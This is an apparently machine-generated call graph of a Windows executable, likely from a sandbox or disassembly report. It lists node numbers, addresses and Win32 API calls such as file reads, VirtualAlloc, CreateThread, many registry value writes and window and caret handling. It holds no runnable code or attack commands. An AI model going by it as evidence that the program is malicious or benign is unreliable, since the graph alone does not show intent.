TranslatorGuardHandler 5 API calls 11413->11416 11414 bd4c3d 11432 bd4b41 11414->11432 11415 bd4bae 11415->11413 11415->11414 11418 bd492e 15 API calls 11415->11418 11420 bd4bd3 __CreateFrameInfo 11415->11420 11419 bd35d2 11416->11419 11418->11420 11424 bd630f 11419->11424 11420->11414 11421 bd4c6a ___scrt_uninitialize_crt MultiByteToWideChar 11420->11421 11422 bd4c1e 11421->11422 11422->11414 11423 bd4c29 GetStringTypeW 11422->11423 11423->11414 11425 bd2f16 50 API calls 11424->11425 11426 bd6322 11425->11426 11436 bd6358 11426->11436 11431 bd4c7b MultiByteToWideChar 11429->11431 11431->11415 11433 bd4b4d 11432->11433 11434 bd4b5e 11432->11434 11433->11434 11435 bd3723 ___free_lconv_mon 14 API calls 11433->11435 11434->11413 11435->11434 11437 bd6373 11436->11437 11438 bd4c6a ___scrt_uninitialize_crt MultiByteToWideChar 11437->11438 11441 bd63b9 11438->11441 11439 bd6531 11440 bcdb85 TranslatorGuardHandler 5 API calls 11439->11440 11442 bd35f3 11440->11442 11441->11439 11443 bd492e 15 API calls 11441->11443 11445 bd63df 11441->11445 11452 bd6465 11441->11452 11442->11408 11443->11445 11444 bd4b41 __freea 14 API calls 11444->11439 11446 bd4c6a ___scrt_uninitialize_crt MultiByteToWideChar 11445->11446 11445->11452 11447 bd6424 11446->11447 11447->11452 11464 bd22fb 11447->11464 11450 bd648e 11453 bd6519 11450->11453 11454 bd492e 15 API calls 11450->11454 11457 bd64a0 11450->11457 11451 bd6456 11451->11452 11456 bd22fb 6 API calls 11451->11456 11452->11444 11455 bd4b41 __freea 14 API calls 11453->11455 11454->11457 11455->11452 11456->11452 11457->11453 11458 bd22fb 6 API calls 11457->11458 11459 bd64e3 11458->11459 11459->11453 11470 bd5a89 11459->11470 11461 bd64fd 11461->11453 11462 bd6506 11461->11462 11463 bd4b41 __freea 14 API calls 11462->11463 11463->11452 11473 bd2517 11464->11473 11468 bd234c LCMapStringW 11469 bd230c 11468->11469 11469->11450 11469->11451 11469->11452 11471 bd5aa0 WideCharToMultiByte 11470->11471 11471->11461 11474 bd2494 _unexpected 5 API calls 11473->11474 11475 bd2306 11474->11475 11475->11469 11476 bd2358 11475->11476 11479 bd2531 11476->11479 11478 bd2363 11478->11468 11480 bd2494 _unexpected 5 API calls 11479->11480 11481 bd2547 11480->11481 11481->11478 11482->11352 11493 bd2e3a 11483->11493 11485 bd348b 11486 bd2e3a 29 API calls 11485->11486 11487 bd34aa 11486->11487 11488 bd34d1 11487->11488 11489 bd3723 ___free_lconv_mon 14 API calls 11487->11489 11490 bd3717 11488->11490 11489->11488 11507 bd25d4 LeaveCriticalSection 11490->11507 11492 bd3705 11492->11326 11494 bd2e4b 11493->11494 11498 bd2e47 CatchIt 11493->11498 11495 bd2e52 11494->11495 11500 bd2e65 __CreateFrameInfo 11494->11500 11496 bd4844 ___free_lconv_mon 14 API calls 11495->11496 11497 bd2e57 11496->11497 11499 bd37f6 ___std_exception_copy 29 API calls 11497->11499 11498->11485 11499->11498 11500->11498 11501 bd2e9c 11500->11501 11502 bd2e93 11500->11502 11501->11498 11504 bd4844 ___free_lconv_mon 14 API calls 11501->11504 11503 bd4844 ___free_lconv_mon 14 API calls 11502->11503 11505 bd2e98 11503->11505 11504->11505 11506 bd37f6 ___std_exception_copy 29 API calls 11505->11506 11506->11498 11507->11492 10061 bd492e 10062 bd496c 10061->10062 10063 bd493c _unexpected 10061->10063 10065 bd4844 ___free_lconv_mon 14 API calls 10062->10065 10063->10062 10064 bd4957 RtlAllocateHeap 10063->10064 10067 bd3a5f _unexpected 2 API calls 10063->10067 10064->10063 10066 bd496a 10064->10066 10065->10066 10067->10063 10068 bcd210 10069 bcd21c ___scrt_is_nonwritable_in_current_image 10068->10069 10094 bcd4bb 10069->10094 10071 bcd223 10072 bcd376 10071->10072 10082 bcd24d ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 10071->10082 10159 bcd78c IsProcessorFeaturePresent 10072->10159 10074 bcd37d 10163 bcffba 10074->10163 10079 bcd26c 10080 bcd2ed 10105 bcd708 10080->10105 10082->10079 10082->10080 10141 bd0004 10082->10141 10083 bcd2f3 10109 bc18d0 10083->10109 10089 bcd313 10090 bcd31c 10089->10090 10150 bcffe6 10089->10150 10153 bcd4f4 10090->10153 10095 bcd4c4 10094->10095 10169 bcd9a5 IsProcessorFeaturePresent 10095->10169 10099 bcd4d5 10104 bcd4d9 10099->10104 10179 bcfeb7 10099->10179 10102 bcd4f0 10102->10071 10104->10071 10304 bcfc90 10105->10304 10108 bcd72e 10108->10083 10111 bc1932 __CreateFrameInfo ___std_exception_copy 10109->10111 10110 bc193f 10148 bcd739 GetModuleHandleW 10110->10148 10111->10110 10112 bc1966 CreateFileW GetFileSize VirtualAlloc ReadFile 10111->10112 10113 bc1a20 EnumSystemCodePagesW 10112->10113 10306 bd0fad 10113->10306 10118 bc1eda 10118->10110 10309 bc20e0 10118->10309 10120 bc1f39 10120->10110 10121 bc1ffc 10120->10121 10122 bc1f60 GetStdHandle GetStdHandle 10120->10122 10325 bc2440 GetACP TranslateCharsetInfo 10121->10325 10123 bc1f97 10122->10123 10125 bc1fe8 10123->10125 10313 bc2310 10123->10313 10353 bc29e0 10125->10353 10129 bc1fdc 10129->10110 10130 bc2022 GetStartupInfoW 10131 bc203f 10130->10131 10337 bc27b0 10131->10337 10132 bc1fc2 10321 bc23a0 10132->10321 10137 bc1bb3 __CreateFrameInfo 10137->10110 10137->10118 10140 bd13a1 51 API calls 10137->10140 10140->10137 10142 bd11db ___scrt_is_nonwritable_in_current_image 10141->10142 10143 bd001a _unexpected 10141->10143 10694 bd264c GetLastError 10142->10694 10143->10080 10149 bcd30f 10148->10149 10149->10074 10149->10089 10797 bd0151 10150->10797 10154 bcd500 10153->10154 10155 bcd324 10154->10155 10872 bcfec9 10154->10872 10155->10079 10157 bcd50e 10158 bcdece ___scrt_uninitialize_crt 7 API calls 10157->10158 10158->10155 10160 bcd7a2 __CreateFrameInfo 10159->10160 10161 bcd84d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10160->10161 10162 bcd898 __CreateFrameInfo 10161->10162 10162->10074 10164 bd0151 __CreateFrameInfo 23 API calls 10163->10164 10165 bcd383 10164->10165 10166 bcffd0 10165->10166 10167 bd0151 __CreateFrameInfo 23 API calls 10166->10167 10168 bcd38b 10167->10168 10170 bcd4d0 10169->10170 10171 bcdeaf 10170->10171 10188 bd1e07 10171->10188 10175 bcdecb 10175->10099 10176 bcdec0 10176->10175 10202 bd1e43 10176->10202 10178 bcdeb8 10178->10099 10242 bd375d 10179->10242 10182 bcdece 10183 bcded7 10182->10183 10184 bcdee1 10182->10184 10185 bd1cb3 ___vcrt_uninitialize_ptd 6 API calls 10183->10185 10184->10104 10186 bcdedc 10185->10186 10187 bd1e43 ___vcrt_uninitialize_locks DeleteCriticalSection 10186->10187 10187->10184 10191 bd1e10 10188->10191 10190 bd1e39 10192 bd1e43 ___vcrt_uninitialize_locks DeleteCriticalSection 10190->10192 10191->10190 10193 bcdeb4 10191->10193 10206 bd609f 10191->10206 10192->10193 10193->10178 10194 bd1c80 10193->10194 10223 bd5fb0 10194->10223 10199 bd1cb0 10199->10176 10201 bd1c95 10201->10176 10203 bd1e6d 10202->10203 10204 bd1e4e 10202->10204 10203->10178 10205 bd1e58 DeleteCriticalSection 10204->10205 10205->10203 10205->10205 10211 bd6131 10206->10211 10209 bd60d7 InitializeCriticalSectionAndSpinCount 10210 bd60c2 10209->10210 10210->10191 10212 bd60b9 10211->10212 10215 bd6152 10211->10215 10212->10209 10212->10210 10213 bd61ba GetProcAddress 10213->10212 10215->10212 10215->10213 10216 bd61ab 10215->10216 10218 bd60e6 LoadLibraryExW 10215->10218 10216->10213 10217 bd61b3 FreeLibrary 10216->10217 10217->10213 10219 bd60fd GetLastError 10218->10219 10220 bd612d 10218->10220 10219->10220 10221 bd6108 ___vcrt_FlsFree 10219->10221 10220->10215 10221->10220 10222 bd611e LoadLibraryExW 10221->10222 10222->10215 10224 bd6131 ___vcrt_FlsFree 5 API calls 10223->10224 10225 bd5fca 10224->10225 10226 bd5fe3 TlsAlloc 10225->10226 10227 bd1c8a 10225->10227 10227->10201 10228 bd6061 10227->10228 10229 bd6131 ___vcrt_FlsFree 5 API calls 10228->10229 10230 bd607b 10229->10230 10231 bd6096 TlsSetValue 10230->10231 10232 bd1ca3 10230->10232 10231->10232 10232->10199 10233 bd1cb3 10232->10233 10234 bd1cbd 10233->10234 10235 bd1cc3 10233->10235 10237 bd5feb 10234->10237 10235->10201 10238 bd6131 ___vcrt_FlsFree 5 API calls 10237->10238 10239 bd6005 10238->10239 10240 bd601d TlsFree 10239->10240 10241 bd6011 10239->10241 10240->10241 10241->10235 10243 bd376d 10242->10243 10244 bcd4e2 10242->10244 10243->10244 10246 bd2c2f 10243->10246 10244->10102 10244->10182 10247 bd2c3b ___scrt_is_nonwritable_in_current_image 10246->10247 10258 bd25bd EnterCriticalSection 10247->10258 10249 bd2c42 10259 bd5d70 10249->10259 10252 bd2c60 10283 bd2c86 10252->10283 10258->10249 10260 bd5d7c ___scrt_is_nonwritable_in_current_image 10259->10260 10261 bd5d85 10260->10261 10262 bd5da6 10260->10262 10264 bd4844 ___free_lconv_mon 14 API calls 10261->10264 10286 bd25bd EnterCriticalSection 10262->10286 10265 bd5d8a 10264->10265 10266 bd37f6 ___std_exception_copy 29 API calls 10265->10266 10267 bd2c51 10266->10267 10267->10252 10272 bd2cbb GetStartupInfoW 10267->10272 10268 bd5dde 10294 bd5e05 10268->10294 10269 bd5db2 10269->10268 10287 bd5cc0 10269->10287 10273 bd2c5b 10272->10273 10274 bd2cd8 10272->10274 10278 bd2d71 10273->10278 10274->10273 10275 bd5d70 30 API calls 10274->10275 10276 bd2d00 10275->10276 10276->10273 10277 bd2d30 GetFileType 10276->10277 10277->10276 10279 bd2d78 10278->10279 10280 bd2dbb GetStdHandle 10279->10280 10281 bd2e1d 10279->10281 10282 bd2dce GetFileType 10279->10282 10280->10279 10281->10252 10282->10279 10303 bd25d4 LeaveCriticalSection 10283->10303 10285 bd2c71 10285->10243 10286->10269 10288 bd48d1 _unexpected 14 API calls 10287->10288 10289 bd5cd2 10288->10289 10293 bd5cdf 10289->10293 10297 bd22b0 10289->10297 10290 bd3723 ___free_lconv_mon 14 API calls 10292 bd5d34 10290->10292 10292->10269 10293->10290 10302 bd25d4 LeaveCriticalSection 10294->10302 10296 bd5e0c 10296->10267 10298 bd2494 _unexpected 5 API calls 10297->10298 10299 bd22cc 10298->10299 10300 bd22ea InitializeCriticalSectionAndSpinCount 10299->10300 10301 bd22d5 10299->10301 10300->10301 10301->10289 10302->10296 10303->10285 10305 bcd71b GetStartupInfoW 10304->10305 10305->10108 10307 bd3723 ___free_lconv_mon 14 API calls 10306->10307 10308 bc1b59 GetOEMCP 10307->10308 10308->10137 10311 bc2106 __CreateFrameInfo ___std_exception_copy 10309->10311 10310 bc2112 CatchIt 10310->10120 10311->10310 10312 bd0fad ___std_exception_destroy 14 API calls 10311->10312 10312->10310 10314 bc2326 10313->10314 10320 bc1fb2 10313->10320 10366 bc74e0 10314->10366 10316 bc2343 10373 bc7990 10316->10373 10319 bc74e0 4 API calls 10319->10320 10320->10125 10320->10132 10322 bc1fd0 10321->10322 10323 bc23c5 10321->10323 10322->10125 10322->10129 10323->10322 10324 bc23d5 CreateThread 10323->10324 10324->10322 10326 bc2497 GetStartupInfoW 10325->10326 10331 bc200a 10325->10331 10327 bc24c8 ___std_exception_copy 10326->10327 10327->10331 10387 bc33d0 10327->10387 10329 bc25d5 GetModuleHandleW LoadIconW 10332 bc2695 GetStockObject RegisterClassW CreateWindowExW 10329->10332 10331->10129 10331->10130 10332->10331 10333 bc275e 10332->10333 10334 bc277e 10333->10334 10390 bc49a0 10333->10390 10396 bc4b10 10334->10396 10338 bc27d3 ___std_exception_copy CatchIt 10337->10338 10339 bd0fad ___std_exception_destroy 14 API calls 10338->10339 10341 bc205b ShowWindow 10338->10341 10340 bc2832 10339->10340 10343 bc74e0 4 API calls 10340->10343 10352 bc2993 10340->10352 10341->10125 10342 bc29a6 SetWindowTextW 10342->10341 10344 bc286b 10343->10344 10345 bc288e WideCharToMultiByte 10344->10345 10347 bc28ec 10345->10347 10346 bc2968 10348 bc74e0 4 API calls 10346->10348 10347->10346 10349 bc2924 WideCharToMultiByte 10347->10349 10350 bc2985 10348->10350 10349->10346 10351 bc7400 4 API calls 10350->10351 10351->10352 10352->10341 10352->10342 10354 bc2a05 CreateEventW 10353->10354 10356 bc2a47 10353->10356 10354->10356 10364 bc2a3b 10354->10364 10356->10364 10686 bc8c80 10356->10686 10357 bc2b88 WaitForMultipleObjects 10361 bc2acb 10357->10361 10358 bc2b50 MsgWaitForMultipleObjects 10358->10361 10359 bc2c56 EnterCriticalSection 10690 bc8cf0 10359->10690 10360 bc2bc9 PeekMessageW 10360->10361 10361->10357 10361->10358 10361->10359 10361->10360 10363 bc2c19 DispatchMessageW 10361->10363 10361->10364 10363->10360 10364->10110 10367 bc74fa 10366->10367 10372 bc750a CatchIt 10366->10372 10368 bc7531 10367->10368 10367->10372 10382 bc7610 10367->10382 10370 bc75a6 WriteFile 10368->10370 10368->10372 10371 bc75e7 GetLastError 10370->10371 10370->10372 10371->10372 10372->10316 10374 bc79b6 10373->10374 10379 bc7a6a _strlen 10373->10379 10375 bc7a72 10374->10375 10377 bc79c5 _strlen 10374->10377 10376 bc74e0 4 API calls 10375->10376 10376->10379 10378 bc74e0 4 API calls 10377->10378 10378->10379 10380 bc74e0 4 API calls 10379->10380 10381 bc235f 10379->10381 10380->10381 10381->10319 10383 bc762a 10382->10383 10385 bc763a 10382->10385 10384 bc763f WriteFile 10383->10384 10383->10385 10384->10385 10386 bc7689 GetLastError 10384->10386 10385->10368 10386->10385 10388 bc33f9 __CreateFrameInfo CatchIt 10387->10388 10389 bc341b GetDpiForSystem MulDiv GetDpiForSystem MulDiv 10388->10389 10389->10329 10393 bc49ce __CreateFrameInfo 10390->10393 10391 bc4a06 EnumFontFamiliesExW 10392 bc4a49 CatchIt 10391->10392 10391->10393 10408 bcc410 10392->10408 10393->10391 10393->10392 10395 bc4aff 10395->10334 10401 bc4b33 __CreateFrameInfo ___std_exception_copy 10396->10401 10397 bc4d0d CatchIt 10399 bc4f36 10397->10399 10456 bc2d40 10397->10456 10460 bc8ed0 10399->10460 10401->10397 10403 bc4cfc 10401->10403 10405 bd0fad ___std_exception_destroy 14 API calls 10401->10405 10406 bd0fad ___std_exception_destroy 14 API calls 10403->10406 10405->10401 10406->10397 10409 bcc484 10408->10409 10410 bcc426 RegCreateKeyW 10408->10410 10411 bcc520 28 API calls 10409->10411 10412 bcc451 10410->10412 10414 bcc44c RegCloseKey 10410->10414 10411->10414 10417 bcc520 10412->10417 10414->10395 10418 bcc53e 10417->10418 10422 bcc556 10417->10422 10419 bc33d0 4 API calls 10418->10419 10419->10422 10420 bcc641 10423 bcc65d RegSetValueExW 10420->10423 10424 bcc6a6 10420->10424 10421 bcc5b6 wsprintfW RegSetValueExW 10421->10422 10422->10420 10422->10421 10423->10424 10425 bcc6c2 RegSetValueExW 10424->10425 10426 bcc70b 10424->10426 10425->10426 10427 bcc727 RegSetValueExW 10426->10427 10428 bcc773 10426->10428 10427->10428 10429 bcc77d lstrcmpW 10428->10429 10430 bcc7aa lstrlenW RegSetValueExW 10428->10430 10429->10430 10431 bcc800 10429->10431 10430->10431 10432 bcc81c RegSetValueExW 10431->10432 10433 bcc868 10431->10433 10432->10433 10434 bcc896 GetDpiForSystem MulDiv GetDpiForSystem MulDiv RegSetValueExW 10433->10434 10435 bcc94f 10433->10435 10434->10435 10436 bcc96b RegSetValueExW 10435->10436 10437 bcc9b7 10435->10437 10436->10437 10438 bcc9d0 RegSetValueExW 10437->10438 10439 bcca19 10437->10439 10438->10439 10440 bcca32 RegSetValueExW 10439->10440 10441 bcca7b 10439->10441 10440->10441 10442 bcca94 RegSetValueExW 10441->10442 10443 bccadd 10441->10443 10442->10443 10444 bccaf6 RegSetValueExW 10443->10444 10445 bccb3f 10443->10445 10444->10445 10446 bccb58 RegSetValueExW 10445->10446 10447 bccba1 10445->10447 10446->10447 10448 bccbba RegSetValueExW 10447->10448 10449 bccc03 10447->10449 10448->10449 10450 bccc2b RegSetValueExW 10449->10450 10451 bccc90 10449->10451 10450->10451 10452 bcccac RegSetValueExW 10451->10452 10453 bcccf5 10451->10453 10452->10453 10454 bccd1d RegSetValueExW 10453->10454 10455 bcc46d RegCloseKey 10453->10455 10454->10455 10455->10414 10457 bc2d7e 10456->10457 10501 bc2e80 10457->10501 10461 bc8f0c 10460->10461 10462 bc8f58 10460->10462 10461->10462 10464 bc910f 10461->10464 10465 bc8f3a IsWindowVisible 10461->10465 10467 bc8fb5 GetDC 10462->10467 10480 bc90ee 10462->10480 10466 bc917d GetWindowLongW AdjustWindowRect 10464->10466 10471 bc951b 10464->10471 10465->10462 10465->10464 10468 bc922f GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10466->10468 10469 bc92e1 ShowScrollBar 10466->10469 10470 bc8fdb CreateCompatibleBitmap ReleaseDC SelectObject 10467->10470 10496 bc4f44 10467->10496 10472 bc9308 10468->10472 10469->10472 10473 bc908c SetRect 10470->10473 10474 bc9074 DeleteObject 10470->10474 10477 bc9557 ScrollWindow SetScrollPos SetScrollPos InvalidateRect 10471->10477 10482 bc965f 10471->10482 10475 bc93ca ShowScrollBar 10472->10475 10476 bc931a GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10472->10476 10516 bcb2e0 10473->10516 10474->10473 10479 bc93f1 SetWindowPos SystemParametersInfoW GetSystemMetrics InvalidateRect UpdateWindow 10475->10479 10476->10479 10477->10482 10479->10482 10526 bc6c90 SetRect 10480->10526 10481 bc97df 10484 bc9824 10481->10484 10528 bcb480 10481->10528 10482->10481 10483 bcb2e0 18 API calls 10482->10483 10486 bc9780 10483->10486 10487 bc9842 GetFocus 10484->10487 10494 bc98db 10484->10494 10527 bc6c90 SetRect 10486->10527 10489 bc9876 10487->10489 10487->10494 10491 bc9889 CreateCaret 10489->10491 10492 bc98e3 DestroyCaret 10489->10492 10490 bc97a1 InvalidateRect UpdateWindow 10490->10481 10537 bca570 10491->10537 10492->10494 10495 bca570 3 API calls 10494->10495 10494->10496 10495->10496 10497 bc17c0 10496->10497 10498 bc17d4 10497->10498 10500 bc1832 10498->10500 10542 bc1000 10498->10542 10500->10331 10502 bc2f82 GetDC 10501->10502 10508 bc2eb1 10501->10508 10503 bc2fb2 CreateFontIndirectW 10502->10503 10515 bc2d93 10502->10515 10504 bc2fcd ReleaseDC 10503->10504 10505 bc2ff8 SelectObject GetTextMetricsW 10503->10505 10504->10515 10506 bc3047 GetTextFaceW SelectObject ReleaseDC 10505->10506 10507 bd0fad ___std_exception_destroy 14 API calls 10506->10507 10509 bc30f4 ___std_exception_copy CatchIt 10507->10509 10508->10502 10508->10515 10510 bc3132 GetCPInfo 10509->10510 10511 bc315a 10510->10511 10512 bc319e 10511->10512 10513 bc3186 DeleteObject 10511->10513 10514 bc31cf DeleteObject 10512->10514 10512->10515 10513->10512 10514->10515 10515->10399 10517 bcb312 10516->10517 10518 bcb2ff ___std_exception_copy 10516->10518 10517->10480 10518->10517 10519 bcb35a SelectObject 10518->10519 10520 bcb390 10519->10520 10521 bcb439 SelectObject 10520->10521 10523 bcb3b6 SetBkColor SetTextColor 10520->10523 10522 bd0fad ___std_exception_destroy 14 API calls 10521->10522 10524 bcb462 10522->10524 10523->10520 10525 bd0fad ___std_exception_destroy 14 API calls 10524->10525 10525->10517 10526->10464 10527->10490 10529 bcb4cc 10528->10529 10530 bcb4a7 GetFocus 10528->10530 10532 bcb4df DeleteObject 10529->10532 10534 bcb4f7 __CreateFrameInfo 10529->10534 10530->10529 10531 bcb4c6 DestroyCaret 10530->10531 10531->10529 10532->10534 10533 bcb568 10533->10484 10534->10533 10535 bcb663 CreateBitmap 10534->10535 10536 bd0fad ___std_exception_destroy 14 API calls 10535->10536 10536->10533 10538 bca5a8 10537->10538 10539 bca589 GetFocus 10537->10539 10538->10494 10539->10538 10540 bca5ad 10539->10540 10541 bca5e0 SetCaretPos ShowCaret 10540->10541 10541->10538 10543 bc1028 10542->10543 10545 bc101c 10542->10545 10547 bc105e CatchIt 10543->10547 10548 bd103c 10543->10548 10545->10500 10547->10545 10561 bc1200 10547->10561 10549 bd5e83 10548->10549 10550 bd5e9b 10549->10550 10551 bd5e90 10549->10551 10553 bd5ea3 10550->10553 10559 bd5eac _unexpected 10550->10559 10578 bd492e 10551->10578 10554 bd3723 ___free_lconv_mon 14 API calls 10553->10554 10557 bd5e98 10554->10557 10555 bd5ed6 HeapReAlloc 10555->10557 10555->10559 10556 bd5eb1 10558 bd4844 ___free_lconv_mon 14 API calls 10556->10558 10557->10547 10558->10557 10559->10555 10559->10556 10560 bd3a5f _unexpected 2 API calls 10559->10560 10560->10559 10576 bc1240 CatchIt 10561->10576 10562 bc126e CatchIt 10565 bc15d2 10562->10565 10592 bc5100 10562->10592 10563 bc15e4 __CreateFrameInfo 10563->10545 10565->10563 10567 bc1649 10565->10567 10568 bc161b 10565->10568 10574 bc1635 10565->10574 10569 bc1678 10567->10569 10613 bc5550 10567->10613 10570 bc4f60 16 API calls 10568->10570 10617 bc56f0 10569->10617 10570->10574 10573 bd0fad ___std_exception_destroy 14 API calls 10575 bc1778 10573->10575 10574->10573 10577 bd0fad ___std_exception_destroy 14 API calls 10575->10577 10576->10562 10585 bc4f60 10576->10585 10577->10563 10579 bd496c 10578->10579 10580 bd493c _unexpected 10578->10580 10582 bd4844 ___free_lconv_mon 14 API calls 10579->10582 10580->10579 10581 bd4957 RtlAllocateHeap 10580->10581 10584 bd3a5f _unexpected 2 API calls 10580->10584 10581->10580 10583 bd496a 10581->10583 10582->10583 10583->10557 10584->10580 10586 bc4f88 10585->10586 10591 bc4f83 CatchIt 10585->10591 10587 bc502d 10586->10587 10588 bc4f95 10586->10588 10590 bc56f0 16 API calls 10587->10590 10587->10591 10589 bc56f0 16 API calls 10588->10589 10589->10591 10590->10591 10591->10576 10621 bc6c90 SetRect 10592->10621 10594 bc5138 10597 bc5328 10594->10597 10622 bc6ce0 10594->10622 10596 bc515a 10606 bc51e8 10596->10606 10609 bc6d90 8 API calls 10596->10609 10601 bc53e7 10597->10601 10630 bc6ef0 10597->10630 10599 bc5511 10656 bc7400 10599->10656 10600 bc54bd 10644 bc70a0 10600->10644 10601->10600 10608 bc54d2 10601->10608 10636 bc6fa0 10601->10636 10602 bc6fa0 4 API calls 10602->10599 10606->10597 10626 bc6d90 10606->10626 10608->10599 10608->10602 10609->10596 10614 bc5571 CatchIt 10613->10614 10615 bc5576 ___std_exception_copy CatchIt 10613->10615 10614->10569 10615->10614 10616 bd0fad ___std_exception_destroy 14 API calls 10615->10616 10616->10614 10618 bc5726 10617->10618 10620 bc571a 10617->10620 10619 bd103c 16 API calls 10618->10619 10619->10620 10620->10574 10621->10594 10623 bc6cf9 10622->10623 10624 bc6d16 10622->10624 10625 bc74e0 4 API calls 10623->10625 10624->10596 10625->10624 10627 bc6db5 10626->10627 10628 bc6ef0 8 API calls 10627->10628 10629 bc6df3 10627->10629 10628->10629 10629->10606 10631 bc6f19 10630->10631 10632 bc6f3d 10631->10632 10633 bc6f57 SetRect 10631->10633 10634 bc70a0 7 API calls 10632->10634 10635 bc6f4f 10633->10635 10634->10635 10635->10601 10637 bc701c 10636->10637 10641 bc6fc1 _strlen 10636->10641 10638 bc7008 10637->10638 10639 bc74e0 4 API calls 10637->10639 10672 bc76c0 10638->10672 10639->10637 10643 bc74e0 4 API calls 10641->10643 10643->10638 10645 bc70b7 10644->10645 10646 bc70fd 10645->10646 10648 bc70e6 10645->10648 10649 bc7119 10645->10649 10681 bc32d0 10646->10681 10648->10608 10649->10648 10650 bc6ce0 4 API calls 10649->10650 10654 bc713d 10650->10654 10651 bc7253 10685 bc6c90 SetRect 10651->10685 10653 bc76c0 4 API calls 10653->10654 10654->10651 10654->10653 10655 bc74e0 WriteFile GetLastError WriteFile GetLastError 10654->10655 10655->10654 10657 bc741e 10656->10657 10663 bc5521 10656->10663 10658 bc74a8 10657->10658 10659 bc742e 10657->10659 10660 bc6ce0 4 API calls 10658->10660 10666 bc7493 10658->10666 10662 bc76c0 4 API calls 10659->10662 10660->10666 10661 bc7610 2 API calls 10661->10663 10664 bc7463 10662->10664 10667 bc3210 10663->10667 10665 bc74e0 4 API calls 10664->10665 10664->10666 10665->10666 10666->10661 10668 bc3246 10667->10668 10669 bc3233 10667->10669 10668->10565 10669->10668 10670 bc3299 PostMessageW 10669->10670 10671 bc3265 SetTimer 10669->10671 10670->10668 10671->10668 10673 bc76e1 10672->10673 10674 bc78ae 10673->10674 10675 bc7777 10673->10675 10678 bc7719 _strlen 10673->10678 10680 bc7095 10673->10680 10676 bc6ce0 4 API calls 10674->10676 10674->10678 10677 bc74e0 4 API calls 10675->10677 10675->10678 10676->10678 10677->10678 10679 bc74e0 4 API calls 10678->10679 10678->10680 10679->10680 10680->10600 10682 bc32fb 10681->10682 10683 bc3210 2 API calls 10682->10683 10684 bc33c1 10683->10684 10684->10648 10685->10648 10687 bc8c98 10686->10687 10688 bc8cad 10686->10688 10689 bd103c 16 API calls 10687->10689 10688->10361 10689->10688 10692 bc8d07 10690->10692 10691 bc2c73 LeaveCriticalSection 10691->10361 10691->10364 10692->10691 10693 bc8c80 16 API calls 10692->10693 10693->10692 10695 bd2668 10694->10695 10696 bd2662 10694->10696 10698 bd226e _unexpected 6 API calls 10695->10698 10700 bd266c SetLastError 10695->10700 10697 bd222f _unexpected 6 API calls 10696->10697 10697->10695 10699 bd2684 10698->10699 10699->10700 10702 bd48d1 _unexpected 14 API calls 10699->10702 10703 bd11ec 10700->10703 10704 bd2701 10700->10704 10705 bd2699 10702->10705 10721 bd1c3c 10703->10721 10706 bd1c3c CallUnexpected 48 API calls 10704->10706 10707 bd26a1 10705->10707 10708 bd26b2 10705->10708 10711 bd2706 10706->10711 10709 bd226e _unexpected 6 API calls 10707->10709 10710 bd226e _unexpected 6 API calls 10708->10710 10712 bd26af 10709->10712 10713 bd26be 10710->10713 10717 bd3723 ___free_lconv_mon 14 API calls 10712->10717 10714 bd26d9 10713->10714 10715 bd26c2 10713->10715 10718 bd295d _unexpected 14 API calls 10714->10718 10716 bd226e _unexpected 6 API calls 10715->10716 10716->10712 10717->10700 10719 bd26e4 10718->10719 10720 bd3723 ___free_lconv_mon 14 API calls 10719->10720 10720->10700 10730 bd3b15 10721->10730 10724 bd1c56 IsProcessorFeaturePresent 10727 bd1c41 10724->10727 10725 bcffd0 __CreateFrameInfo 23 API calls 10725->10727 10726 bd383a __CreateFrameInfo 8 API calls 10726->10727 10727->10721 10727->10724 10727->10725 10727->10726 10729 bd1216 10727->10729 10733 bd3b3c 10727->10733 10760 bd1cdc 10727->10760 10774 bd3d99 10730->10774 10734 bd3b48 ___scrt_is_nonwritable_in_current_image 10733->10734 10735 bd279d __CreateFrameInfo 14 API calls 10734->10735 10736 bd3b6f __CreateFrameInfo 10734->10736 10740 bd3b75 __CreateFrameInfo 10734->10740 10735->10736 10737 bd3bbc 10736->10737 10736->10740 10759 bd3ba6 10736->10759 10738 bd4844 ___free_lconv_mon 14 API calls 10737->10738 10739 bd3bc1 10738->10739 10741 bd37f6 ___std_exception_copy 29 API calls 10739->10741 10742 bd3be8 10740->10742 10785 bd25bd EnterCriticalSection 10740->10785 10741->10759 10745 bd3d1b 10742->10745 10746 bd3c2a 10742->10746 10756 bd3c59 10742->10756 10747 bd3d26 10745->10747 10790 bd25d4 LeaveCriticalSection 10745->10790 10751 bd264c _unexpected 50 API calls 10746->10751 10746->10756 10750 bcffd0 __CreateFrameInfo 23 API calls 10747->10750 10752 bd3d2e 10750->10752 10754 bd3c4e 10751->10754 10753 bd264c _unexpected 50 API calls 10757 bd3cae 10753->10757 10755 bd264c _unexpected 50 API calls 10754->10755 10755->10756 10786 bd3cc8 10756->10786 10758 bd264c _unexpected 50 API calls 10757->10758 10757->10759 10758->10759 10759->10727 10761 bd1ce8 GetLastError 10760->10761 10762 bd1ce5 10760->10762 10792 bd6026 10761->10792 10762->10727 10765 bd1d62 SetLastError 10765->10727 10766 bd6061 ___vcrt_FlsSetValue 6 API calls 10767 bd1d16 __CreateFrameInfo 10766->10767 10769 bd6061 ___vcrt_FlsSetValue 6 API calls 10767->10769 10770 bd1d3e 10767->10770 10773 bd1d1c 10767->10773 10768 bd6061 ___vcrt_FlsSetValue 6 API calls 10771 bd1d52 10768->10771 10769->10770 10770->10768 10770->10771 10772 bd0fad ___std_exception_destroy 14 API calls 10771->10772 10772->10773 10773->10765 10775 bd3da5 ___scrt_is_nonwritable_in_current_image 10774->10775 10780 bd25bd EnterCriticalSection 10775->10780 10777 bd3db3 10781 bd3df1 10777->10781 10780->10777 10784 bd25d4 LeaveCriticalSection 10781->10784 10783 bd3b3a 10783->10727 10784->10783 10785->10742 10787 bd3cce 10786->10787 10789 bd3c9f 10786->10789 10791 bd25d4 LeaveCriticalSection 10787->10791 10789->10753 10789->10757 10789->10759 10790->10747 10791->10789 10793 bd6131 ___vcrt_FlsFree 5 API calls 10792->10793 10794 bd6040 10793->10794 10795 bd6058 TlsGetValue 10794->10795 10796 bd1cfd 10794->10796 10795->10796 10796->10765 10796->10766 10796->10773 10798 bd017e 10797->10798 10799 bd018f 10797->10799 10808 bd0039 GetModuleHandleW 10798->10808 10815 bd02d3 10799->10815 10804 bcfff1 10804->10090 10809 bd0045 